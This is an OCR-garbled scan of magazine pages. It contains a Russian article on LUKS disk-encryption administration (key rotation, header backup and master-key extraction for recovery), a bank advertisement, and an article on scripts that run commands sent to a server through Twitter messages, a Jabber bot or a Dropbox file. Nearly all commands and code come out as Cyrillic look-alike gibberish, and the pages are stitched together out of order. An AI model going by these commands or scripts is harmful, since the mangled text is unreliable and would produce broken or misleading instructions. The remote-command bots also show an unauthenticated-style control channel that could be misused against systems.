с чл 2 © ш © мы 


ьтно 


Ги) 


т Ш ча м м 
=] 


о 


68 


Ва 92 
41 94 сз 
0 9В 1 
008110 ©@0 98 
вовОО120 90 99 
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ЗАПРЕТ ОБНОВЛЕНИЯ ЯДРА 


Для выключения обновления ядра создай файл в /@с/арИрге!егепсе$.а/ следующего 


содержания: 


РасКазе: 11пих-вепег1с 11пих-Веадег$-вепег1с 11пих-1тазе-вепег1с ‹= 


11 пих-ге${г1сфеа-тоди1е$ -вепег1с 


Р1п: \ег$1оп 3.5.0-17.28 


Р1п-Рг1ог1фу: 1001 


Версия, естественно, может отличаться. 


После копирования можешь пытаться 
загрузиться с флешки. Если все прошло 
нормально, спустя какое-то время ты 
увидишь приглашение входа в систему 


у 


Начало заголовкашиф- 
рованного тома 


М 

УБОК$ хорошая 
документация по архи- 
тектуре 


| -1121-9802.68с: 
1923625599097....| 


И скопировать все файлы на шифрованные разделы — по- 
нятно, не на работающей системе. Загружаемся снова с МуеСЬ, 
подключаем криптотом, монтируем разделы и набираем следу- 
ющие команды: 


# ср -г --ргезегуе=а11 /ти*/ипсгуржеЯ/* += 
[тп /\5-гоо*/ 

# ср -г --ргезегуе=а11 /ти*/ипсгуред/поте/* += 
/тп{/\м5-Поте/ 


После копирования можешь пытаться загрузиться с флеш- 
ки — только выбери пункт меню Убити сгурто. Если все прошло 
нормально, спустя какое-то время ты увидишь приглашение 
входа в систему. В таком случае могу тебя поздравить — ты уже 
работаешь в шифрованной системе. 


ДОБАВЛЕНИЕ /ИЗМЕНЕНИЕ КЛЮЧЕЙ 
Допустим, тебе понадобилось изменить ключ — ты его ском- 
прометировал или просто создал политику смены и хочешь ей 


содержание 


САБРИНА 

№ реетезиуьея 

Венок епогур Гонт зреть 
сгуроодгарЫе РазИ 
РАКЕ 

р-ереуыат 

№ ТЬе рагНЕрог Вызьет 


тозтеКеоуеяриь дент Бу шзе! 
у тазегКеу Кепегаке тгзпфот честог №аз1В- тэмегКоуцеаий 
мегьнол 1 
(ЦИК$.МАСС 
рЬфг. мег оп 1 
р фе. стриег -пэте 2$ зиррИеб Бу изее 
р фе. стриег -тоде 2$ зиррНе@ Бу изее 
рЬ г. Кеу-— Буре тазегКеу 
| рб! ти @бщезт за кепегате гапбот уесто! 
епт: 1К$._$А11$17Е 


Роллаго сот ре ЬНИЕу р№б! . таб! 


№ ПИКУ срегаНоны 


ч чыыычыцьыь 
| 


Вай РымЕНОА 


Мажтаг Ку гасомегу 
Разррлисги гемиеноаи Иня $ 


разралст а ЕРегкрги Ы Бепс а! вед эссоеб тк 10 ие! 1трыт 


СопчеаьгИх 12 {{" 010ег уе Ижеёед то №) 
ВЫ оогарЬу 23 рА бе _ ти березт — мега! ой соци 2% эБоче 
РНОЯ 25 С бгикЕ 4 рб! тикет РВКОЕ? ( тазие! Кеу 
СпрНаг ага назв зресгк.. 14 рЬ4! . ти 91 резт за 
Р№бе . Ти: рез - еганой -сошии , 
КИК$.ОСЕЗТЗ ЕЕ ) 
$111 рез ТИК ТНРЕ$ 0, ие! беНтед 
`птерег Чун , гезьМ гошпдед домп 
Базе О! (ет (з12е о! рб) /ЗЕСТОКУМЕ + 1 
Кеу М этег! э1бестогв [ заггрезетэмегКоугевст В ) / 5ЕСТОЯ.$МЕ + 1 
{ог вас Кеуз!от п р№4е э$ К | 
К%. эсшуе ЦИК$.КЕ\У.ОбАВНЕО 


К%. чеегрев $1 грез 
Кз. Кеу— тэ ег: 1 о Рае Базе О Нвей 
Базе О Ч хет Базе О Нее + КоуМэтет а бестоге 


} 


Бэзе О вет 
рЬфг. мы кепегэаке ци 


рЬфг. разу! оз фо уе 


мене ридг 10 ЧЕ 


Риге 3 Ржеко сое Кх рамой нинаНяж кю 


174 


© гооЕ@иБипЕи-сгурЕо: - 
гоосвиБипеи-сгурфо:-# поупт 


/деу/таррег/уд-гооф оп / Фуре ех{4 (ги, еггогз=гетоупт -го) 


ргос оп /ргос Туре ргос (ги, поехес , пози\9 ‚подеу) 
|5у5Р5 оп /5у$ Фуре зу$Р5 (гм, поехес ‚по5зи19 ‚ подем) 
попе оп /5у$/Р$/Ризе/соппесе\оп$ Туре РГизесе\ (гы) 
попе оп /5у5/Кегпе1 /деБид фуре деБудР5 (гм) 

попе оп /5уз/Кегпе1т/зесиг\АТу Туре зесигоФуР$ (ги) 
удеу оп /деу Фуре деуетрР$ (ги, поде=0755) 
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Грузимся с ИмеСр и монтируем носитель с бэкапом. После 
этого восстанавливаем заголовок: 


# сгуре5ефир 1чК$НеадегВезфоге /аем/54а «= 
- -Неааег-БаскКир-В1е /тпе/ЯазИ/1иК$Неааег.61п 


Подключаем шифрованный том с использованием резерв- 
ной копии старого ключа: 


деурЕ5 оп /дем/рф$ Туре деуре$ (ги, поехес , по5и19 ,919=5,тподе=0620) 


Е мрЁ$ оп /гуп Туре %трР$ (гм, поехес , пози\9, $1ге=10%,поде=0755) 
попе оп /гип/ЛосК Туре %трР5 (ги, поехес ‚пози19 , подем , $512е=5242880) 


попе оп /гип/5пм Фуре ТтрР$ (Ги, по50и19 , подему) 


попе оп /гип/узег Туре +трР$ (гм, поехес , пози\9 ‚подем, $12е=104857600 ‚моде=0755) 


/Зеу/59Р2 оп /Бооф фуре ехЁ? (гм) 
|/ем/таррег /уд-Коме оп /поме туре ех{4 (гм) 


|9уР59-Ризе оп /гип/изег/гот/дуГ5 Туре Гизе.9у7$9-Гизе (гы, пози\9 ‚ подем , изег=гот) 
/дем/5г@ оп /мед\фа/гот/ИБипфи 12.10 1386 Туре 1509660 (го, пози\1 9, подеу , и19=1000, 
1919=1000 ‚ТосНагзет=иР8 , поде=0400 , 9тоде=0500 ‚ упе1рег=и91$К$2) 


гоосбиБипти -сгурто:-й 


неукоснительно следовать. Что для этого нужно? Прежде всего 
сделать резервную копию заголовка тома 1УК$ — если все бу- 
дет нормально, после смены ключа ты ее сможешь уничтожить. 
Делаем мы ее, понятно, на нешифрованный раздел: 


# точпф /4еу/5а+1 /тпе/ЯазИ 

# сгурезефир 1чк$НеадегВасКир «= 
/аем/а15К/Бу-чи1а/с34е4с91-1+а1-4802-88са-+= 
9с36е5с99097 --Пеадег-БасКкир-Я1е += 


/тп&/ЯазИй/1иК$Неаадег.61п 


После этого сделаем копию файла ключа (просто скопируем 
его) и сгенерируем новый ключ: 


# 4 1+=/аеу/гапаот о+=/Боо*/пем_Кеу.61п Б6$=1 «= 
соипф=512 


Смотрим текущие кейслоты (места в заголовке шифрован- 
ного тома, где хранятся ключи — их может быть больше одного) 
и запоминаем номер активного (Епаеа). Обычно это нулевой. 


# сгуре5ефир 1иК$битр /4ем/а1$К/бу-иита/ += 
с34е4с91-1+а1-4802-88са-9с36е5с99097 


Добавляем новый ключ в систему: 


# сгурЕзефир 1чКзАааКе аеу/а1$К/Бу-чи1а/+= 
с34е4с91-1+а1-4802-88са-9с36е5с99097 ++ 
/боо{/пем_Кеу.61п --Кеу-Я1е /Боо*/Кеу.61п 


и заменяем старый файл ключа новым: 


# ту /Боо*/пем_Кеу.61п /Боот/Кеу.61п 


# ирдафе-1п1гам$ -и 


Перезагружаемся, чтобы убедиться, что мы ничего не сло- 
мали, и удаляем старый ключ: 


# сгуре5ефир 1иК$К1115$10& /аем/91$К/Бу-чи1а/-= 


с34е4с91-1+а1-4802-88са-9с36е5с99097 @ «= 


--Кеу-Я1е /Боо{/Кеу.Б1п 


Снова перезагружаемся. Если и в этот раз все в порядке, 
с облегчением вздыхаем. Мы успешно сменили ключ. 


ВОССТАНОВЛЕНИЕ ДОСТУПА 
КЗАКРИПТОВАННОМУТОМУ 

Предположим, ты потерял ключ. Что делать? Главным об- 
разом — не паниковать. Если у тебя есть резервная копия 
заголовка и ключ, который ты применял до ее создания, 
но ты не можешь загрузиться с него, то для восстановления до- 
ступа производим следующее. 


# сгуре5ефир -9=/тп{/Яа$И/о19_Кеу.61п ТчК$Ореп «= 
/аем/з94а сгурфоа1$К 


И производим восстановительные работы (чрутимся, про- 
брасываем каталог с резервной копией, монтируем /Бо<\1, ко- 
пируем резервную копию ключа в /боокеу.6т и обновляем 
шпИгат?5). Перезагружаемся — все готово. 

Но что, если ты каким-то непостижимым образом затер все 
свои кейслоты и у тебя нет резервных копий заголовка? Если 
ты после этого еще и перезагрузился, могу тебя поздравить — 
твои данные невосстановимы. Если же ты не перезагрузился... 
что ж, есть шанс, что тебе удастся восстановить том. Для этого 
тебе прежде всего необходимо извлечь мастер-ключ, который 
хранится в памяти: 


Вывод команды тоипт 


# Аатзефир Фаб1е --фагвеф сгуре --зПошКеу «= 
еу/таррег/сгур®оа1 $К 


Самая длинная непрерывная строчка и будет мастер-клю- 
чом. Ее нужно скопировать в файл на нешифрованный том и по- 
сле этого преобразовать в бинарную форму (перед этим убе- 
дись, что в файле нет никаких символов конца строки): 


# саЁ тазЖег-Кеу.Ехе | хха -г -р >маз%ег-Кеу.Б1п 


Размер файла таег-Кеу.бт в случае тех параметров соз- 
дания криптотома, которые использовались в статье, должен 
составлять 32 байта. 

После извлечения мастер-ключа ты должен загрузиться с 
(меСЬ и проинициализировать том заново с использованием 
данного мастер-ключа и твоего нового ключа шифрования — 
надеюсь, как его генерировать, описывать не надо: 


# сгурЕ5ефир -Пп=$Па256 -с=аез-сЬс-е$$1у: °Иа256 «+ 
-5$=256 ТиК$Рогтае /4ем/за4 /тпе/боо*/Кеу.Б1п ‹= 
- -тазег-Кеу-А1е=/тп{/Яа$И/та$ег-Кеу.Б1п 


Производим процедуры по восстановлению, описанные чуть 
выше. 

В заключение статьи хочу напомнить: для защиты информа- 
ции нужно принимать комплексные меры, и шифрование лишь 
одна из них. 2 


Редактирование 
/етс/Ётаь 


гоо@ФиБипЕу-сгурКо: -- 


© 
Гефс/Т5Каб: $зфат1с ТА\е зуз$бет 1пГогпа оп. 


деу1се; +115 тау Бе иузед и1ЕВ ЦОТО= а$ а моге гоБуз{ мау То паме деу\1сез 


я 
# Це 'Б1К19' Фо рг1тЕ {Ве уптуегза Ту ип1ауе 1деп11ТР\1ег Гог а 
я 
# ТНаг ногК$ еуеп 1РГ 915К$ аге аддед ап гетоуед. $ее Езтаь(5). 
и 
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<РЩе зузтем> <моупт ро\пЕ> <Туре> <орТоп5> <димр> <ра$5> 


еггог- =гепоцпт-го 6 1 
деРау1 +5 


/Чем/таррег/уд-гоот / ехе4 

ЦИТО=997са139-074а-4616-а116-3а42Геа67459 /боот ехЕ2 
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[дем /таррег/мд-Поме /поме ех{4 деГау1 15 9 
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9 


/медта/ТТорруд аифто ги, узег ‚ поауфо ‚ ехес ‚ и ТЗ 9 


/де\м/е90 


"/ефс/Т5Таб" 13 Ипе$, 712 спагасжег$ 


арах 1 


правлять своими счетами, используя си 


интернет-банка «Альфа-Клик» 


Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях. 
ОАО «Альфа-Банка», а также заказав по телефонам: 


8 (495) 788-88-78 в Москве | 8-800-2000-000 в регионах России (звонок бесплатный) 


ве 
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УПРАВЛЯЕМ УДАЛЕННОЙ 
МАШИНОЙ С ПОМОЩЬЮ 
СООСЕЕ ТАЕК, ТММТТЕВН, 
ОВОРВОХ И СООСЕЕ+ 


У 


Евгений Зобнин 
ехесри.ги 


о 
т" 


Сегодня социальные сервисы окружают - Камеру слежения с отчетом в Соое+. Мы сделаем простой 
нас со всех сторон. Мы чатимся в Чаббег, читаем бот, который будет выкладывать в боо!е+ фотографии, сде- 


ланные веб-камерой. Так мы сможем следить за чем угодно 


НОВОСТИ В Тми(ег, выкладываем фотки В Фооче+. удаленно без необходимости в специальном сервисе. 
Видео по запросу. Мы сделаем бот, который будет по на- 


Мы делаем это с домашних компов, смартфонов шему запросу снимать видео определенной длительности, 
и планшетов ежедневно в почти автоматическом а затем выкладывать его в наш приватный канал УочТире. 

режиме. Для многих из нас ТмЩег или Гасебоок Все это делается уиз+ Гог Тип, поэтому я заранее соглашусь 
давно стал заменой электрон НОЙ ПОЧТЫ И |ВС- с теми, кто скажет, что подобные вещи нужно делать с помощью 


З$Н и специальных веб-панелей управления. В то же время 


чатов. Так почему бы не использовать те же сер- хочу заметить, что некоторые из приведенных приемов могут 
ы быть удобнее классических подходов. Но обо всем по порядку. 
висы для мониторинга удаленнои машины и даже 
управления ей? ТМЛТТЕВИ ОТЧЕТЫ 0 СОСТОЯНИИ 
Для многих людей Твиттер уже давно превратился в источник 
«быстрых новостей». Если ты тоже привык использовать его 
с этой целью, то включение в общий поток сводок с информа- 
ПОСТАНОВКА ЗАДАЧИ цией о твоем сервере или домашней машине может быть очень 
В этой статье мы рассмотрим несколько интересных приемов, с помощью которых удачной идеей. 
можно настроить: Как это сделать? Для этого понадобятся: новый аккаунт 
. Мониторинг удаленной машины средствами ТммЩег. Мы создадим специального в Твиттере, консольный твиттер-клиент и простой скрипт, ко- 
твиттер-юзера, от лица которого наш сервер/медиацентр/ПК будет слать сообще- торый будет генерировать нужные нам сводки информации. 
ния о своем состоянии, мы сможем читать их через веб или с помощью клиента. С первым все просто. Регистрируем новый е-тай, создаем ак- 
Управление через уаббег. Мы сделаем уабБег-бот, который будет выступать по- каунт, делаем его приватным и добавляем свой основной акка- 
средником между нами и консолью удаленной машины. Все написанные ему сооб- унт в список подписчиков. Таким образом доступ кинформации 
щения будут интерпретироваться как консольные команды, ответ на которые будет о состоянии сервера сможешь получить только ты. 
выслан в ответном сообщении. Далее нам понадобится клиент, с помощью которого мы бу- 
Управление через ОгорБох. Мы создадим простой демон, который будет выполнять дем отправлять отчеты. Популярный ТТ\ег справится с этой 
команды по мере их появления в указанном файле внутри диска Огорбох. задачей на отлично. Устанавливаем: 
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$ зидо арЕ-веф 1п5%а11 ++уЕег 


Запускаем клиент, видим сообщение, что необходимо по- 
лучить ОАШП-токен, соглашаемся нажатием <Ещег>. Видим 
на экране ссылку, открываем ее в браузере и нажимаем кнопку 
«Авторизовать». На экране появится Р!И№-код, который следует 
скопировать и ввести в ответ на приглашение ТТ\ег. Теперь 
можно отправить тестовый твит вот так: 


$ есйо "Привет из консоли!" | {уег -$сг1ре 


Аеще лучше так: 


$ +гее | вгер Мет | «куег -зсг1ре 


Другими словами, теперь мы можем отправить вывод аб- 
солютно любой команды на нашу страницу в Твиттере, просто 
перенаправив ее вывод в ТТ\Цег. Написав же небольшой скрипт 
и прописав его в расписание сгоп, мы можем сделать так, что- 
бы машина отправляла любую указанную информацию через 
определенные промежутки времени. Для примера возьмем 
следующий скрипт (фактически это сильно урезанная и дора- 
ботанная версия скрипта, опубликованного в блоге ТакЗг.сот): 


$ м1 -/61п/ м1 ег-топ1 ог. $ 
#1! /61п/Ба$в 

# Формируем твит 

# Имя хоста 

НО$Т=`По$фпате -$` 


# Аптайм машины 
УР=`ире1те | сиё -4"_" -44,5 | си -4"," -#1` 


# Средняя нагрузка 
[ОАб=` ир1те | сие -4":" -+5,6` 


# Скорость пинга 
РТМ№б=`р1п8 -4а -с 3 воо1е.сом | %а11 -п1 | си «= 
-4"/" -45 | си -а"." -+41` 


# Количество занятой памяти 
МЕМ=`р$ аих | амк '{ зим += $4 }; ЕМО { рг1пе = 
5им }'` 


# Нагрузка на процессор 
СРИУ=`р$ аих | амк '{ ит += $3 }; ЕЮ { реле + 
им }'` 


777 
» ЧАУЕег 
тгу1пд фо пд СИЮ ,,. Гизг/Б1т/исуг] 
-- 54геат!пд АР] 915а6]еЧ (по -до$1геат) (ТТУег ш11] изе ВЕЗТ АРТ оп1у) 
-- по уегз1оп сКеск регТогтед (изе /усКеск, ог -усбеск фо спеск оп эфагфур) 
(слеск1пд сгедеп{1а1$) 1е51-1091п ЗУССЕЕСЕС! 
-- ргосез$1п9 сгедеп{1а1$; 1099е9 1п аз такзпа%свет 
ВНЕ ЕЕНЕВЕЕЯННННИННИВЫННННИНВННИНВНИВНВНИННННННННЫНЫНЫЯ Ч00==ЕЕЕЕЕЕ=00+ 
ТТУНег 2.1.Й (с)2012 сатегоп Ка1зег @ @ 
а11 г{ор+$ гезегуед, +00= — =====00+ 
ВЕЁр: //шши, Г] ооддар , сот/ зо Тшаге/ Фу Тег/ а==: 000 
.++0++, , 00 
Тгеешаге ипдег +Ае 1|]ооддар Тгее 5о14шаге 11сепзе, +++ "ба: 
КЕр: //шши. Т1ооддар .сот/зоТшаге/ +1 1/ +**0++ #  ‘ооа 
#+$ФАВ= 
Тшееф ме; ВЁр: И/фш1 Тег , сот/ Ту Тег #;::000;; 
+е1] ме: скКа1зег@Т ]|ооддар . сот #+а;+++;0 


НЫ „$В.коккх 0$, 
# а=0$*0*0*Фо=а 


# шпеп геаду, №14 ВЕТИУРНИЕНТЕЮ Гог а ргопр\. @$$$$$6 
# Туре /Ке]р Тог соттапд$ ог /ди1{ №о ди\. ВововВов 
# эфаг1тп9 Баскдгоупд топ1Фог1п9 ргосе55, 9=8 @=@ 
Н 
й 
7 т 
ТТУКегв интерактив- Личные сообщения о соррщеные 
ном режиме 
| С Выш =. 
ее 2013 х86_ 64 сми о 


Ответотсервера 


будешь только ты, мы можем организовать удаленное управление сервером с помощью от- 
правки приватных сообщений. Последнее приватное сообщение с помощью ТТ\(ег полу- 
чаем так: 


$ еспо "/ата +1" | +куег -зсг1ре 
[ОМ да@] [ехобп1п/Тие Маг 26 09:59:59 +0000 2013] 1езЕ фе$+ 


Соответственно, чтобы создать систему, которая будет выполнять команды, отправ- 
ленные в приватных сообщениях, мы должны написать неболышой скрипт, который будет 
в цикле читать приватные сообщения, обрезать всю лишнюю инфу из вывода (все, что нахо- 
дится между квадратными скобками) и выполнять сообщение как одну команду. Выглядеть 
это будет примерно так: 


$ м1 -/61п/ м1 ег-соттапа. $П 
#1! /Б1п/ $ И 
мй11е %гие; ао 
СМО=`еспо "/дта +1" | Еуег -зсг1ре | зеа '$/\[.*\]\ //'` 


# Собираем инфу вместе 
ТИЕЕТ=" (НО$Т) ${НО$Т} (УР) ${ИР} (СРУ) ${СРИ}% ‹ 


$Н $СМО 
$1еер 60 
допе 


МЕМ МЕМ}% (10АО ОАБ РТМ РТМ@ } м5" 


# Отправляем твит 
есйо ФТМЕЕТ | «уег -зсг1ре 


Он собирает такую информацию, как имя хоста, аптайм, 
пинг до гугла, количество памяти, нагрузка на процессор, 
и отправляет все это одним твитом. Скрипт больше подходит 
для мониторинга сервера, но ты можешь изменять его как взду- 
мается, главное — проверить, чтобы в итоге вся инфа умеща- 
лась в 140 символов, что можно сделать, заменив последнюю 
команду скрипта на «еспо $Т\МЕЕТ | \мс -с» и запустив его. 

Теперь осталось лишь добавить скрипт в сготарб, чтобы 
он запускался, например, каждый час: 


$ сгопЖаЬ -е 


Это самый примитивный вариант решения проблемы, страдающий от двух недостатков: 
во-первых, скрипт не знает, выполнил ли он уже команду, и будет делать это при каждой 
итерации цикла, даже если новых сообщений не поступало; во-вторых, у скрипта нет об- 
ратной связи, что хоть и не очень полезно в случае с ТммЩег, но может быть хорошим допол- 
нением. Поэтому мы доработаем скрипт до приемлемого состояния: 


$ м1 -/61п/ м1 ег-соттапа. $П 
#1! /ч$г/Ь1п/Ба$И 
# Имя твиттер-юзера для ответов 
И5ЕК=" изег" 
мИи11е %гие; ао 
# Получаем личное сообщение (команду) 
СМО=`еспо "/4та +1" | +уЕег -зсг1ре | зеа '$/\[.*\]\ //' 
# Проверяем, выполняли ли такую команду в прошлый раз 
1 [ $СМО 1!= $0102_СМО ]; «Неп 


@ * * * * /путь/до/ скрипта. $1 


Сделать это необходимо от имени того пользователя, от ко- 
торого ты получил токен для ТТ\Цег. 


УПРАВЛЕНИЕЧЕРЕЗ Т\МТТЕВ 

Утилиту ТГ@ег можно использовать не только для автомати- 
ческой отправки твитов, но и для автоматического получения 
личных сообщений и твитов от других пользователей. Учитывая 
то, что он привязан к приватному аккаунту, в друзьях у которого 


# Если нет — выполняем 

ВЕРЕ=` $СМО` 

# и отправляем ответ команды юзеру 

еспо "/дт ФИЗЕВ ${ВЕРЬ:0:140}" | +Еуеег -зсг1 ре 
# Сохраняем команду, чтобы не выполнять ее снова 
СМО = $0Е0_СМО 


в 
# Спим минуту 
51еер 60 

допе 


17$ Отхога 


Этот скрипт ведет себя гораздо умнее. Он отправляет результат выполнения команды 
юзеру, автоматически сокращая его до 140 символов, и запоминает последнюю выполнен- 
ную команду, чтобы не запускать ее снова. С другой стороны, при запуске скрипт все равно 
выполнит последнюю отправленную ему команду, но я не думаю, что в этом есть большая 
проблема. 


УПРАВЛЕНИЕЧЕРЕЗ ЧАВВЕВ/СТАЕК 

ТмиЦег может быть отличным инструментом для мониторинга машины, но использовать его 
для того, чтобы отдавать удаленные команды, довольно неудобно. Гораздо лучше для этого 
подходит уаббег, который изначально был придуман для ведения текстового диалога меж- 
ду двумя сторонами. 

В Ипих есть несколько инструментов, позволяющих отсылать и принимать уаббег- 
сообщения из консоли (например, СОС: с с.|а]сиз$.пе\), но для реализации нашей задачи го- 
раздо лучше подойдет Рибу-библиотека хтррётг-зитр/е, позволяющая реализовать уаббег- 
клиент, написав буквально три строки. Библиотека есть в репозитории ВиБу Сегт$, поэтому 
для ее установки, например, в Убити следует набирать такие команды: 


$ зидо арЕ-веф 1п$5%а11 гибу 

$ зи4ао ар*-веф 1п5%а11 гиБувет$ 
$ вет 1п5$$а11 хтрр4г-$1тр1е 

$ вет 1п$%а11 зе$5$1оп 


Чтобы убедиться в ее работоспособности, можно использовать такой скрипт: 


$ м1 зепа-теззаре.гЬ 

#1! /ч5г/61п/епу гиБбу 

геди1ге 'гибузетз' 

геди1ге 'хтрр4г-$1тр1е' 

ЗабБег = За бег: :$1тр1е.пем(‘'юзер@;та11.сот', 'пароль’) 
ЗабБег .ае11\ег("адресат@5та11.сот", "Привет, бта11!") 


Для решения нашей задачи такой скрипт бесполезен, но, дописав в него каких-то десять 
строк, мы реализуем полноценный бот: 


$ м1 ЗабБег-Бо*.гЬ 

#1! /и5г/61п/епму гиБбу 

геди1ге 'гибузет$з' 

геди1ге 'хтрр4г-$1тр1е' 

геди1ге '5е5$1оп' 

# Запускаем сеанс $Н, в котором будет происходить выполнение команд 
@5И = 5е5$1оп: : пем 
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Боф.ае11уег(т$5.Фгот, "\п"_ + «= 
$Еаои*.спотр) ичп1ез5 ${4ои{ .етр*у? 


# Отправляем поток ошибок 
Боф.49е11уег(т$5. гот, "\п" + «= 
$Еаегг.спотр) ип1ез5 ${аегг.етр*у? 
епа 
епа 


Приведенный бот прост, но отлично справляется со своей 
работой. Все, что нужно сделать, — это завести юзера для бота, 
прописать его логин и пароль, а также адрес своего основно- 
го чаббег-аккаунта в скрипт, затем запустить скрипт и написать 
на адрес бота нужную команду. Результат запуска придет в от- 
ветном сообщении. Это действительно удобно, особенно когда 
нет возможности или времени выполнять полноценный логин 
по ЗН (например, с телефона). 

Для тех, кто говорит, что это жутко небезопасно, скажу, 
что бот будет выполнять только команды, пришедшие с указан- 
ного адреса, а так как в протоколе ХМРР за проверку обратного 
адреса отвечает сам ХМРР-сервер, то спуфинг адреса с целью 
захвата управления будет возможен только в случае захва- 
та самого сервера. Проблемой остается то, что шифрование 
на уровне протокола отсутствует, но при использовании \УРМ 
риски сведутся к минимуму. 


УПРАВЛЕНИЕ СПОМОЩЬЮ ОВОРВОХ 

Ты можешь удивиться, но рулить машиной можно даже с по- 
мощью Огоррох. По сути, это такой же грязный хак, не претен- 
дующий на роль нормального решения, но даже он может быть 
полезен в определенных ситуациях. В основе его работы лежит 
идея записи команд в файл. Клиент создает текстовый файл 
внутри каталога Огорбох и помещает в него строку, содержа- 
щую команду. На стороне сервера работает скрипт, который 
в цикле проверяет существование файла и, если такой суще- 
ствует, выполняет содержащуюся в нем команду и записывает 
ответ в другой файл. Серверный скрипт выглядит следующим 
образом: 


$ м1 -/ОгорБох/зегуег . $Н 
#1! /Бтп/Ба$й 


# Коннектимся к ЭЗабБег-серверу 
Боф = ЗабБег: :$1тр1е .пем(логин@та11.сот, пароль) 


# Входим в бесконечный цикл 


мй1]е +гие 


мИ11е +гие; ао 


# Ожидаем сообщение 


Боф.гесе1уед_теззаре$ 4о |тз8| 


# Файл существует? 


# Проверяем, что сообщение пришло от юзер@ёта11. сот 


1+ [ -Е прич. %хе ]; «Пеп 


1+ 58 && тур. гот. Ко_5.1пс1и4е? (юзер@=та11 . сот) 


# Читаем файл, выполняем команду и запи- 


# Выполняем команды в сеансе $1 


# сываем ответ в другой файл 


$ЕАои{, °ЕАегг = @5И.ехеси*е(тзв.Боау) 1+ те .Боау 


ОЧТСОМ=$ (саЕ 1при*.*х®) 


# Отправляем в ответном сообщении выво команды 
\ (2 — фобщвынь дни = =— * & : < 
пел итаыенй = Мом Видео № а Автоматически за- 
ды рек груженное видео 
ищи г в \УочТибе 
ЕЕ [= . 
НУ БЕ = Фзнеыны = ы Ч 
рн Скрипт управления 
настеощы киви через Твиттер 


#! /изг/Ь1п/БазВ 
05ЕВ="егобп1п” 
шр1]е 1гиуе; до 
СМО= есКо “/дта +1" | 44и4{ег -зсг1рф | зед 'з/\Г,*\]\ //' 
17 Г $СМО != $0.0_СМО 1; {Реп 
РЕРЁ=` $СМО` 
еспо “/дт ФУ5ЕЮ ${ЮЕРЬ:8:140}” | 1ту4ег -зсг1р+ 
СМО = $010_С0М0 
71 
5$1еер 68 
допе 


ФОУТСОМ > оцЕри*. хе 


# Удаляем входной файл 

гт Зиприф.Ехе > /4еу/пи11 2>81 
е1 зе 

# Если файла нет, уходим в сон 

51еер 10 


в 
аопе 


После запуска скрипта любой, кто подключит тот же том 
Огорбох (зайдет с того же аккаунта), сможет выполнить команду 
на сервере, просто записав ее в файл шрш.{ч. Так, например, 
можно управлять серверной машиной через веб-интерфейс, 
со смартфона или любого устройства, на котором есть клиент 
Огорбох. Для удобства управления с другой Ипих-машины мож- 
но использовать такой скрипт: 


$ м1 -/Огорбох/с11еп*.5И 

#1! /б1п/Ба$й 

# Создаем входной и выходной файлы 
Фоисй 1приф. хе 

ФоисИ оифриф. хе 

# Читаем команду 

еспо -п "Епфег Соттапа: 
геаа тмсом 

# Записываем команду в файл и ждем, пока клиент 
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# ее не прочитает, сигналом о чем для нас станет 
# удаление файла 
есНо “"$ТМСОМ" > 1при{. хе 
мй11е [ -+ 1приф.%хе ];4о 
51еер 10 


опе 


# Выводим на экран ответ сервера 
саЕ очЕри{. хе 


При запуске скрипт выводит приглашение к вводу команды, 
после чего записывает ее в файл и ждет ответа. Все просто, 
к тому же такой способ коммуникации довольно безопасен. Ни- 
кто не знает точно, могут ли сотрудники Огоррох на самом деле 
читать наши данные, но соединение между клиентом и серве- 
ром всегда зашифровано, что защищает от перехвата данных. 
А это, на мой взгляд, гораздо важнее. 


АВТОЗАГРУЗКА ФОТО СКАМЕРЫ В Р!ИСАЗА/СООСЕЕ+ 
Аккаунт Сооде сегодня есть у всех, а значит, есть доступ 
к Сооде+, Рсаза и куче других полезных и не очень сервисов. 
Большинство из них можно заскриптовать с помощью утили- 
ты командной строки Соо ест, которая позволяет работать 
с такими сервисами, как Р!саза, Календарь, Вооддег, Контакты, 
Документы и УочТире прямо из командной строки. С помощью 
этого инструмента можно делать множество интересных ве- 
щей, однако я покажу только два его применения: автоматиче- 
ская публикация фоток с веб-камеры в альбом Р'саза (бооде+) 
и снятие видео с той же камеры и публикация в УочТиВе по за- 
просу. 

Чтобы реализовать такое, понадобится сам Соо есь, кото- 
рый есть в любом дистрибутиве, а также в репозитории РУПоп: 


$ зи4ао ар*-веф 1п${а11 2#001ес1 
$ зиао р14р 1п5%а11 воо21ес1 


Далее мы должны создать новый альбом в Раза, куда будут 
автоматически загружаться фотографии с веб-камеры: 


$ 20021е р1саза сгеафе ШеБСатега 


При первом обращении к сервису Рсаза автоматически 
откроется страница в веб-браузере, в которой следует на- 
жать кнопку «Разрешить», чтобы предоставить СооесСЕ права 
на управление сервисом. После этого можно вернуться в тер- 
минал и нажать <Ещег>. 

Теперь нам нужно научиться делать сам снимок. Для этого 
можно использовать тр!ауег. Сначала запускаем в тестовом 
режиме: 


$ шр1ауег +: // 


Если получили на экран картинку с другого подключенного 
видеоустройства (Т\-тюнер, например) или с другой камеры, 
перебираем все устройства в поисках нужного, меняя маео0 
на маео1, маео2 и так далее: 


$ тр1ауег +%\:// -Е\у аеу1се=/аем/у14ео@ 


Если картинка перевернута, применяем фильтр: 


$ трТауег +\%:// -\м{ Я1р 


Пробуем сделать снимок: 


$ тр1ауег +\:// -Ргатез 3 -\уо Зрев 


Получаем три снимка: 00000001.{рд, 00000002.ра 
и 00000003.{рч9. Это три последовательных кадра. Такое ко- 
личество нужно потому, что многие дешевые камеры просто 
не успевают инициализироваться и вместо нормального изо- 
бражения поначалу выдают кашу (у меня первый кадр — зеле- 
ный экран, второй — съехавшая картинка, третий — нормаль- 
ный снимок). Теперь все, что нужно, — это написать скрипт, 
который будет делать снимок и загружать его в Р’саза. У меня 
получилось вот что: 


770 


> 90091е Не1р уоутиБе 
ЯАуа1]аБ]е +азКз Рог зегу1се цоц%ибе: ‘роз+', '+а9’, '115%', 'Че]е*е’ 
ро5+: Розф а у14ео, 
Вечи1гез: эгс ЯМО сафедогу ЯМО деуКеу Ор+1опа]: +141е, эзиттагу, +295, ассезз 


Тад: НЯ9 ад5 Фо а у!Чео ап9/ог сВбапде 115 саедогу. 
Веду1гез: 1111е ЯМО (эа95 ОК сатедогу) АМО деукеу 


|151; 1151 у14ео5ё Бу изег. 
Юецу1"ез! 112195 АМО 9е11т1%е" Орф1опа1: +111е, ошпе“ 


де1ефе! Ое1ефе у10де0$. 
Рецу1гез: 1111е АМО деуКечу 


> 900901е цчоуфубе ро$ф у19ео.тро --ассез$=рг Гуафе --сафтедогу Едуса*1оп 

[оа41п9 у19ео0.тро 

